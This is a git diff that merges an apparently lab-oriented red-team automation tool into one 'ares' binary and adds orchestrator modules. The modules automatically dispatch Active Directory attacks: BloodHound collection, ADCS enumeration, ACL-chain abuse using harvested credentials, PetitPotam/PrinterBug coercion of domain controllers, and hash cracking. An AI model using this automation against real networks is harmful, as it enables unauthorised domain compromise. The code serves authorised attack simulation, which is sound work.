-f "{{.BIN_DIR}}/$bin" ] && continue - local_hash=$(shasum -a 256 "{{.BIN_DIR}}/$bin" | awk '{print $1}') - TOTAL_CHECKED=$((TOTAL_CHECKED + 1)) - - result=$(check_binary "$bin" "$pod" "$local_hash") - case "$result" in - OK) - echo -e "{{.SUCCESS}} $bin @ $pod: OK" - TOTAL_MATCH=$((TOTAL_MATCH + 1)) - ;; - MISSING) - echo -e "{{.WARN}} $bin @ $pod: MISSING" - TOTAL_MISSING=$((TOTAL_MISSING + 1)) - echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" - ;; - DIFFERS) - echo -e "{{.ERROR}} $bin @ $pod: DIFFERS" - TOTAL_DIFFER=$((TOTAL_DIFFER + 1)) - echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" - ;; - esac - done + # Check all pods: single ares binary + local_hash=$(shasum -a 256 "{{.BIN_DIR}}/ares" | awk '{print $1}') + ALL_PODS="$ORCH_PODS $WORKER_PODS" + for pod in $ALL_PODS; do + [ -z "$pod" ] && continue + TOTAL_CHECKED=$((TOTAL_CHECKED + 1)) + + result=$(check_binary "ares" "$pod" "$local_hash") + case "$result" in + OK) + echo -e "{{.SUCCESS}} ares @ $pod: OK" + TOTAL_MATCH=$((TOTAL_MATCH + 1)) + ;; + MISSING) + echo -e "{{.WARN}} ares @ $pod: MISSING" + TOTAL_MISSING=$((TOTAL_MISSING + 1)) + echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" + ;; + DIFFERS) + echo -e "{{.ERROR}} ares @ $pod: DIFFERS" + TOTAL_DIFFER=$((TOTAL_DIFFER + 1)) + echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" + ;; + esac done - # Check worker pods: ares-worker only - if [ -n "$WORKER_PODS" ] && [ -f "{{.BIN_DIR}}/ares-worker" ]; then - local_hash=$(shasum -a 256 "{{.BIN_DIR}}/ares-worker" | awk '{print $1}') - for pod in $WORKER_PODS; do - TOTAL_CHECKED=$((TOTAL_CHECKED + 1)) - - result=$(check_binary "ares-worker" "$pod" "$local_hash") - case "$result" in - OK) - echo -e "{{.SUCCESS}} ares-worker @ $pod: OK" - TOTAL_MATCH=$((TOTAL_MATCH + 1)) - ;; - MISSING) - echo -e "{{.WARN}} ares-worker @ $pod: MISSING" - TOTAL_MISSING=$((TOTAL_MISSING + 1)) - echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" - ;; - DIFFERS) - echo -e "{{.ERROR}} ares-worker @ $pod: DIFFERS" - TOTAL_DIFFER=$((TOTAL_DIFFER + 1)) - echo "$FAILED_PODS" | grep -q "$pod" || FAILED_PODS="$FAILED_PODS $pod" - ;; - esac - done - fi - echo "" echo "========================================" echo -e "{{.INFO}} Summary: $TOTAL_CHECKED checked, $TOTAL_MATCH match, $TOTAL_DIFFER differ, $TOTAL_MISSING missing" @@ -1092,7 +1054,7 @@ tasks: BIN_DIR: 'target/{{.RUST_TARGET}}/release' REMOTE_BIN_DIR: '/usr/local/bin' preconditions: - - sh: test -f {{.BIN_DIR}}/ares-cli + - sh: test -f {{.BIN_DIR}}/ares msg: "Binary not found. 
Run: task remote:rust:build" cmds: - | @@ -1124,31 +1086,17 @@ tasks: FAILED=0 - # Deploy to orchestrator pods: ares-cli + ares-orchestrator - for pod in $ORCH_PODS; do - echo -e "{{.INFO}} Deploying to orchestrator: $pod" - for bin in ares-cli ares-orchestrator; do - if kubectl cp "{{.BIN_DIR}}/$bin" "$pod:{{.REMOTE_BIN_DIR}}/$bin" \ - -n {{.K8S_NAMESPACE}} 2>/dev/null; then - # Make executable - kubectl exec -n {{.K8S_NAMESPACE}} "$pod" -- chmod +x "{{.REMOTE_BIN_DIR}}/$bin" 2>/dev/null - echo -e "{{.SUCCESS}} $bin -> $pod" - else - echo -e "{{.ERROR}} $bin -> $pod FAILED" - FAILED=$((FAILED + 1)) - fi - done - done - - # Deploy to worker pods: ares-worker only - for pod in $WORKER_PODS; do - echo -e "{{.INFO}} Deploying to worker: $pod" - if kubectl cp "{{.BIN_DIR}}/ares-worker" "$pod:{{.REMOTE_BIN_DIR}}/ares-worker" \ + # Deploy single ares binary to all pods + ALL_PODS="$ORCH_PODS $WORKER_PODS" + for pod in $ALL_PODS; do + [ -z "$pod" ] && continue + echo -e "{{.INFO}} Deploying to: $pod" + if kubectl cp "{{.BIN_DIR}}/ares" "$pod:{{.REMOTE_BIN_DIR}}/ares" \ -n {{.K8S_NAMESPACE}} 2>/dev/null; then - kubectl exec -n {{.K8S_NAMESPACE}} "$pod" -- chmod +x "{{.REMOTE_BIN_DIR}}/ares-worker" 2>/dev/null - echo -e "{{.SUCCESS}} ares-worker -> $pod" + kubectl exec -n {{.K8S_NAMESPACE}} "$pod" -- chmod +x "{{.REMOTE_BIN_DIR}}/ares" 2>/dev/null + echo -e "{{.SUCCESS}} ares -> $pod" else - echo -e "{{.ERROR}} ares-worker -> $pod FAILED" + echo -e "{{.ERROR}} ares -> $pod FAILED" FAILED=$((FAILED + 1)) fi done @@ -1183,22 +1131,11 @@ tasks: --field-selector=status.phase=Running \ -o jsonpath='{.items[0].metadata.name}' 2>/dev/null || true) - # Check orchestrator - if [ -n "$ORCH_POD" ]; then - echo -e "\n{{.INFO}} Orchestrator: $ORCH_POD" - for bin in ares-cli ares-orchestrator; do - VER=$(kubectl exec -n {{.K8S_NAMESPACE}} "$ORCH_POD" -- \ - $bin --version 2>/dev/null || echo "NOT FOUND") - echo " $bin: $VER" - done - fi - - # Check workers + # Check all pods for pod in $ALL_PODS; do - [ "$pod" = "$ORCH_POD" ] && continue VER=$(kubectl exec -n {{.K8S_NAMESPACE}} "$pod" -- \ - ares-worker --version 2>/dev/null || echo "NOT FOUND") - echo " $pod: ares-worker $VER" + ares --version 2>/dev/null || echo "NOT FOUND") + echo " $pod: $VER" done rust:deploy:config: diff --git a/.taskfiles/remote/orchestrator-wrapper-patch.json b/.taskfiles/remote/orchestrator-wrapper-patch.json index 2a8a83fa..9ee1be92 100644 --- a/.taskfiles/remote/orchestrator-wrapper-patch.json +++ b/.taskfiles/remote/orchestrator-wrapper-patch.json @@ -8,7 +8,7 @@ "op": "replace", "path": "/spec/template/spec/containers/0/args", "value": [ - "echo \"ares-orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares-cli ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n echo \"Starting operation: ${OP_ID:-unknown}\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares-orchestrator\n status=$?\n echo \"Operation ${OP_ID:-unknown} exited with status $status\" >&2\n fi\ndone" + "echo \"ares orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n echo \"Starting operation: 
${OP_ID:-unknown}\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares orchestrator\n status=$?\n echo \"Operation ${OP_ID:-unknown} exited with status $status\" >&2\n fi\ndone" ] } ] diff --git a/.taskfiles/remote/orchestrator-wrapper-patch.yaml b/.taskfiles/remote/orchestrator-wrapper-patch.yaml index e8c04913..a6f9674b 100644 --- a/.taskfiles/remote/orchestrator-wrapper-patch.yaml +++ b/.taskfiles/remote/orchestrator-wrapper-patch.yaml @@ -9,14 +9,14 @@ spec: - -c args: - | - echo "ares-orchestrator queue dispatcher starting" >&2 + echo "ares orchestrator queue dispatcher starting" >&2 while true; do - OP_REQUEST=$(RUST_LOG=error ares-cli ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true) + OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true) if [ -n "$OP_REQUEST" ]; then OP_ID=$(printf '%s\n' "$OP_REQUEST" | sed -n 's/.*"operation_id"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p') echo "Starting operation: ${OP_ID:-unknown}" >&2 export ARES_OPERATION_ID="$OP_REQUEST" - ares-orchestrator + ares orchestrator status=$? echo "Operation ${OP_ID:-unknown} exited with status $status" >&2 fi diff --git a/.taskfiles/remote/orchestrator-wrapper.sh b/.taskfiles/remote/orchestrator-wrapper.sh index 4c4e19d6..b5014b0d 100755 --- a/.taskfiles/remote/orchestrator-wrapper.sh +++ b/.taskfiles/remote/orchestrator-wrapper.sh @@ -1,12 +1,12 @@ #!/bin/sh -echo "ares-orchestrator queue dispatcher starting" >&2 +echo "ares orchestrator queue dispatcher starting" >&2 while true; do - OP_REQUEST=$(RUST_LOG=error ares-cli ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true) + OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true) if [ -n "$OP_REQUEST" ]; then OP_ID=$(printf '%s\n' "$OP_REQUEST" | sed -n 's/.*"operation_id"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p') echo "Starting operation: ${OP_ID:-unknown}" >&2 export ARES_OPERATION_ID="$OP_REQUEST" - ares-orchestrator + ares orchestrator status=$? 
echo "Operation ${OP_ID:-unknown} exited with status $status" >&2 fi diff --git a/Cargo.lock b/Cargo.lock index 7ca5a6a0..df957d00 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -112,15 +112,20 @@ version = "0.1.0" dependencies = [ "anyhow", "ares-core", + "ares-llm", + "ares-tools", + "async-trait", "chrono", "clap", "dotenvy", "redis", "regex", + "rstest", "serde", "serde_json", "serde_yaml", "sqlx", + "thiserror 2.0.18", "tokio", "tracing", "tracing-subscriber", @@ -176,28 +181,6 @@ dependencies = [ "uuid", ] -[[package]] -name = "ares-orchestrator" -version = "0.1.0" -dependencies = [ - "anyhow", - "ares-core", - "ares-llm", - "ares-tools", - "async-trait", - "chrono", - "redis", - "regex", - "rstest", - "serde", - "serde_json", - "serde_yaml", - "tokio", - "tracing", - "tracing-subscriber", - "uuid", -] - [[package]] name = "ares-tools" version = "0.1.0" @@ -219,27 +202,6 @@ dependencies = [ "uuid", ] -[[package]] -name = "ares-worker" -version = "0.1.0" -dependencies = [ - "anyhow", - "ares-core", - "ares-llm", - "ares-tools", - "async-trait", - "chrono", - "redis", - "serde", - "serde_json", - "serde_yaml", - "thiserror 2.0.18", - "tokio", - "tracing", - "tracing-subscriber", - "uuid", -] - [[package]] name = "async-lock" version = "3.4.2" diff --git a/Cargo.toml b/Cargo.toml index bcbf3369..89032d3a 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [workspace] resolver = "2" -members = ["ares-core", "ares-cli", "ares-llm", "ares-orchestrator", "ares-worker", "ares-tools"] +members = ["ares-core", "ares-cli", "ares-llm", "ares-tools"] [workspace.dependencies] serde = { version = "1", features = ["derive"] } diff --git a/Taskfile.yaml b/Taskfile.yaml index ac366251..53e402ed 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -84,7 +84,7 @@ vars: # Config file (single source of truth for model assignments) ARES_CONFIG: '{{.ARES_CONFIG | default "./config/ares.yaml"}}' # Rust CLI binary - ARES_CLI: '{{.ARES_CLI | default "./target/release/ares-cli"}}' + ARES_CLI: '{{.ARES_CLI | default "./target/release/ares"}}' # Infrastructure K8S_NAMESPACE: '{{.K8S_NAMESPACE | default "attack-simulation"}}' TARGET_PROFILE: '{{.TARGET_PROFILE | default "lab"}}' @@ -237,7 +237,7 @@ tasks: echo "" echo "Environment:" echo " Rust: $(rustc --version 2>/dev/null || echo 'not installed')" - echo " ares-cli: $({{.ARES_CLI}} --version 2>/dev/null || echo 'not built — run task rust:release')" + echo " ares: $({{.ARES_CLI}} --version 2>/dev/null || echo 'not built — run task rust:release')" echo "" echo "Configuration:" echo " Platform: {{.DREADNODE_SERVER_URL}}" diff --git a/ares-cli/Cargo.toml b/ares-cli/Cargo.toml index 35249d2b..2d74c6ec 100644 --- a/ares-cli/Cargo.toml +++ b/ares-cli/Cargo.toml @@ -2,29 +2,41 @@ name = "ares-cli" version = "0.1.0" edition = "2021" -description = "CLI for the Ares red team orchestration system" +description = "Unified binary for the Ares red team orchestration system" [[bin]] -name = "ares-cli" +name = "ares" path = "src/main.rs" [features] default = ["blue"] -blue = ["ares-core/blue"] +blue = ["ares-core/blue", "ares-llm/blue", "ares-tools/blue"] [dependencies] ares-core = { path = "../ares-core", features = ["telemetry"] } +ares-llm = { path = "../ares-llm" } +ares-tools = { path = "../ares-tools" } serde = { workspace = true } serde_json = { workspace = true } +serde_yaml = { workspace = true } tokio = { workspace = true } redis = { workspace = true } chrono = { workspace = true } tracing = { workspace = true } tracing-subscriber = { workspace = true } clap = { 
workspace = true } -serde_yaml = { workspace = true } anyhow = { workspace = true } uuid = { workspace = true } sqlx = { workspace = true } regex = { workspace = true } dotenvy = "0.15" +async-trait = "0.1" +thiserror = { workspace = true } + +[build-dependencies] +serde = { version = "1", features = ["derive"] } +serde_yaml = "0.9" + +[dev-dependencies] +tokio = { workspace = true } +rstest = "0.26" diff --git a/ares-cli/build.rs b/ares-cli/build.rs new file mode 100644 index 00000000..d64a2249 --- /dev/null +++ b/ares-cli/build.rs @@ -0,0 +1,95 @@ +//! Build script — generates `tools_for_role()` from `tools.yaml`. +//! +//! The generated file is written to `$OUT_DIR/tool_tables.rs` and +//! included by `tool_check.rs` via `include!`. + +use std::collections::BTreeMap; +use std::env; +use std::fs; +use std::io::Write; +use std::path::Path; + +use serde::Deserialize; + +#[derive(Deserialize)] +struct ToolsFile { + roles: BTreeMap, +} + +#[derive(Deserialize)] +struct RoleDef { + tools: Vec, +} + +#[derive(Deserialize)] +struct ToolCategory { + binaries: Vec, +} + +fn main() { + let manifest_dir = env::var("CARGO_MANIFEST_DIR").unwrap(); + let yaml_path = Path::new(&manifest_dir) + .parent() // workspace root + .unwrap() + .join("tools.yaml"); + + println!("cargo::rerun-if-changed={}", yaml_path.display()); + + let yaml_content = fs::read_to_string(&yaml_path).unwrap_or_else(|e| { + panic!("Failed to read {}: {e}", yaml_path.display()); + }); + + let tools_file: ToolsFile = serde_yaml::from_str(&yaml_content).unwrap_or_else(|e| { + panic!("Failed to parse {}: {e}", yaml_path.display()); + }); + + let out_dir = env::var("OUT_DIR").unwrap(); + let dest = Path::new(&out_dir).join("tool_tables.rs"); + let mut f = fs::File::create(&dest).unwrap(); + + // Generate WORKER_ROLES constant (used in tests). + let role_names: Vec<&str> = tools_file.roles.keys().map(|s| s.as_str()).collect(); + writeln!(f, "/// All worker roles that have tool requirements.").unwrap(); + writeln!(f, "#[cfg(test)]").unwrap(); + writeln!(f, "const WORKER_ROLES: &[&str] = &[").unwrap(); + for role in &role_names { + writeln!(f, " {role:?},").unwrap(); + } + writeln!(f, "];\n").unwrap(); + + // Generate tools_for_role(). + writeln!( + f, + "/// Tools expected on each worker role's container image." + ) + .unwrap(); + writeln!(f, "///").unwrap(); + writeln!( + f, + "/// Auto-generated from `tools.yaml` — do not edit by hand." 
+ ) + .unwrap(); + writeln!( + f, + "fn tools_for_role(role: &str) -> &'static [&'static str] {{" + ) + .unwrap(); + writeln!(f, " match role {{").unwrap(); + + for (role, def) in &tools_file.roles { + let binaries: Vec<&str> = def + .tools + .iter() + .flat_map(|cat| cat.binaries.iter().map(|s| s.as_str())) + .collect(); + writeln!(f, " {role:?} => &[").unwrap(); + for bin in &binaries { + writeln!(f, " {bin:?},").unwrap(); + } + writeln!(f, " ],").unwrap(); + } + + writeln!(f, " _ => &[],").unwrap(); + writeln!(f, " }}").unwrap(); + writeln!(f, "}}").unwrap(); +} diff --git a/ares-cli/src/cli/mod.rs b/ares-cli/src/cli/mod.rs index cb25bd97..4b3df31e 100644 --- a/ares-cli/src/cli/mod.rs +++ b/ares-cli/src/cli/mod.rs @@ -16,8 +16,8 @@ pub(crate) use blue::BlueCommands; #[derive(Parser)] #[command( - name = "ares-cli", - about = "Ares red team orchestration CLI", + name = "ares", + about = "Ares red team orchestration system", version, propagate_version = true )] @@ -76,4 +76,10 @@ pub(crate) enum Commands { /// Configuration management (single source of truth) #[command(subcommand)] Config(ConfigCommands), + + /// Run the orchestrator (long-running service) + Orchestrator, + + /// Run a worker (task executor) + Worker, } diff --git a/ares-cli/src/main.rs b/ares-cli/src/main.rs index d1d5f9a3..a59305a1 100644 --- a/ares-cli/src/main.rs +++ b/ares-cli/src/main.rs @@ -1,7 +1,7 @@ -//! Ares CLI — unified command-line interface for the Ares red team orchestration system. +//! Ares — unified binary for the Ares red team orchestration system. //! -//! Replaces the Python CLI scripts (cli_ops.py, cli_blue_ops.py, cli_history.py) -//! with a single native binary. Pure Redis/Postgres client, no Python interop. +//! Consolidates CLI, orchestrator, and worker into a single binary with +//! subcommands: `ares ops`, `ares orchestrator`, `ares worker`, etc. #[cfg(feature = "blue")] mod blue; @@ -11,9 +11,11 @@ mod dedup; mod detection; mod history; mod ops; +mod orchestrator; mod redis_conn; mod secrets; mod util; +mod worker; mod transport; @@ -93,5 +95,7 @@ async fn run(cli: Cli) -> Result<()> { Commands::Blue(cmd) => blue::run_blue(cmd, cli.redis_url).await, Commands::History(cmd) => history::run_history(cmd).await, Commands::Config(cmd) => config::run_config(cmd), + Commands::Orchestrator => orchestrator::run().await, + Commands::Worker => worker::run().await, } } diff --git a/ares-cli/src/orchestrator/automation/acl.rs b/ares-cli/src/orchestrator/automation/acl.rs new file mode 100644 index 00000000..a8b9e253 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/acl.rs @@ -0,0 +1,149 @@ +//! auto_acl_chain_follow -- dispatch ACL chain steps using available creds. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Follows ACL chains from BloodHound results, dispatching each step when +/// credentials for the source user are available. +/// Interval: 30s. Each chain is a JSON array of steps; we find the first +/// undispatched step whose source user has known credentials and dispatch it. +pub async fn auto_acl_chain_follow( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Skip if domain admin already achieved + { + let state = dispatcher.state.read().await; + if state.has_domain_admin { + continue; + } + } + + // Collect work items: (dedup_key, chain_step, credential) + let work: Vec<(String, serde_json::Value, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + + if state.acl_chains.is_empty() { + continue; + } + + let mut items = Vec::new(); + + for (chain_idx, chain) in state.acl_chains.iter().enumerate() { + // Each chain is expected to be a JSON array of step objects + let steps = match chain.as_array() { + Some(s) => s, + None => { + // Or it might be an object with a "steps" field + match chain.get("steps").and_then(|v| v.as_array()) { + Some(s) => s, + None => continue, + } + } + }; + + for (step_idx, step) in steps.iter().enumerate() { + let dedup_key = format!("chain:{}:step:{}", chain_idx, step_idx); + + // Skip already dispatched steps + if state.dispatched_acl_steps.contains(&dedup_key) { + continue; + } + if state.is_processed(DEDUP_ACL_STEPS, &dedup_key) { + continue; + } + + // Get the source user for this step + let source_user = step + .get("source") + .or_else(|| step.get("source_user")) + .or_else(|| step.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + let source_domain = step + .get("source_domain") + .or_else(|| step.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + + if source_user.is_empty() { + continue; + } + + // Find credential for the source user + let cred = state.credentials.iter().find(|c| { + c.username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || c.domain.to_lowercase() == source_domain.to_lowercase()) + }); + + if let Some(cred) = cred { + items.push((dedup_key, step.clone(), cred.clone())); + } + + // Only dispatch the first undispatched step per chain + break; + } + } + + items + }; + + // Dispatch each collected step + for (dedup_key, step, cred) in work { + let payload = json!({ + "technique": "acl_chain_step", + "step": step, + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + match dispatcher + .throttled_submit("acl_chain_step", "acl", payload, 4) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + step_key = %dedup_key, + "ACL chain step dispatched" + ); + // Mark as dispatched in both in-memory set and dedup + { + let mut state = dispatcher.state.write().await; + state.dispatched_acl_steps.insert(dedup_key.clone()); + state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone()); + } + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key) + .await; + } + Ok(None) => {} // deferred or throttled + Err(e) => warn!(err = %e, "Failed to dispatch ACL chain step"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/adcs.rs b/ares-cli/src/orchestrator/automation/adcs.rs new file mode 100644 index 00000000..4a9022d3 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/adcs.rs @@ -0,0 +1,79 @@ +//! auto_adcs_enumeration -- detect ADCS servers via CertEnroll share. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Detects ADCS servers by looking for CertEnroll shares and dispatches certipy_find. +/// Interval: 30s. 
Matches Python `_auto_adcs_enumeration`. +pub async fn auto_adcs_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Find CertEnroll shares on unprocessed hosts + get a credential + let work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + let cred = match state + .credentials + .iter() + .find(|c| { + !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + state + .shares + .iter() + .filter(|s| s.name.to_lowercase() == "certenroll") + .filter(|s| !state.is_processed(DEDUP_ADCS_SERVERS, &s.host)) + .map(|s| { + let domain = state.domains.first().cloned().unwrap_or_default(); + (s.host.clone(), domain, cred.clone()) + }) + .collect() + }; + + for (host_ip, domain, cred) in work { + match dispatcher + .request_certipy_find(&host_ip, &domain, &cred) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, host = %host_ip, "ADCS enumeration dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ADCS_SERVERS, host_ip.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &host_ip) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch ADCS enumeration"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/bloodhound.rs b/ares-cli/src/orchestrator/automation/bloodhound.rs new file mode 100644 index 00000000..8b805cea --- /dev/null +++ b/ares-cli/src/orchestrator/automation/bloodhound.rs @@ -0,0 +1,81 @@ +//! auto_bloodhound -- BloodHound collection per domain. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use ares_llm::routing::find_domain_credential; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches BloodHound collection for each discovered domain. +/// Interval: 30s. Matches Python `_auto_bloodhound`. +/// +/// Selects the best credential per domain (same-domain preferred, with +/// trust-scope enforcement) instead of using a single global credential. +pub async fn auto_bloodhound(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + if state.credentials.is_empty() { + continue; + } + + state + .domains + .iter() + .filter(|d| !state.is_processed(DEDUP_BLOODHOUND_DOMAINS, d)) + .filter_map(|domain| { + let dc_ip = state.domain_controllers.get(domain).cloned()?; + // Select best credential for this specific domain + let cred = find_domain_credential( + domain, + &state.credentials, + &state.netbios_to_fqdn, + &state.trusted_domains, + ); + match cred { + Some(c) => Some((domain.clone(), dc_ip, c.clone())), + None => { + debug!(domain = %domain, "No valid credential for BloodHound"); + None + } + } + }) + .collect() + }; + + for (domain, dc_ip, cred) in work { + match dispatcher.request_bloodhound(&domain, &dc_ip, &cred).await { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "BloodHound collection dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_BLOODHOUND_DOMAINS, domain.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_BLOODHOUND_DOMAINS, &domain) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch BloodHound"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/coercion.rs b/ares-cli/src/orchestrator/automation/coercion.rs new file mode 100644 index 00000000..1e89f4f8 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/coercion.rs @@ -0,0 +1,78 @@ +//! auto_coercion -- trigger ESC8 relay and DC coercion. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Triggers coercion attacks when ADCS ESC8 servers or unconstrained delegation hosts exist. +/// Interval: 30s. Matches Python `_auto_coercion`. +pub async fn auto_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Coerce DCs that haven't been coerced yet + let work: Vec<(String, String)> = { + let state = dispatcher.state.read().await; + // Find any host with unconstrained delegation as a listener + let _listener = state.hosts.iter().find(|h| { + h.roles + .iter() + .any(|r| r.to_lowercase().contains("unconstrained")) + }); + + state + .domain_controllers + .iter() + .filter(|(_, dc_ip)| !state.is_processed(DEDUP_COERCED_DCS, dc_ip)) + .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) + .collect() + }; + + for (domain, dc_ip) in work { + // Find a listener IP for the coercion (any host we own) + let listener_ip = { + let state = dispatcher.state.read().await; + state.hosts.iter().find(|h| h.owned).map(|h| h.ip.clone()) + }; + + let listener = match listener_ip { + Some(ip) => ip, + None => continue, + }; + + match dispatcher + .request_coercion(&dc_ip, &listener, &["petitpotam", "printerbug"]) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, dc = %dc_ip, domain = %domain, "DC coercion dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_COERCED_DCS, dc_ip.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_COERCED_DCS, &dc_ip) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch coercion"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/crack.rs b/ares-cli/src/orchestrator/automation/crack.rs new file mode 100644 index 00000000..84a998fe --- /dev/null +++ b/ares-cli/src/orchestrator/automation/crack.rs @@ -0,0 +1,75 @@ +//! auto_crack_dispatch -- submit crack tasks for new hashes. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{debug, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +use super::crack_dedup_key; + +/// Scans for uncracked hashes and submits crack tasks. +/// Interval: 15s. Matches Python `_auto_crack_dispatch`. +pub async fn auto_crack_dispatch(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(15)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Collect unprocessed hashes + let work: Vec<(String, ares_core::models::Hash)> = { + let state = dispatcher.state.read().await; + state + .hashes + .iter() + .filter(|h| h.cracked_password.is_none()) + .filter_map(|h| { + let dedup = crack_dedup_key(h); + if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { + None + } else { + Some((dedup, h.clone())) + } + }) + .collect() + }; + + // Serialize crack tasks: hashcat only allows one instance at a time. + // Skip this tick if a cracker task is already running. + if dispatcher.tracker.count_for_role("cracker").await > 0 { + debug!("Crack task already active, skipping dispatch this tick"); + continue; + } + + // Only dispatch one crack task per tick to avoid hashcat PID conflicts. + // Remaining hashes will be picked up on subsequent ticks. 
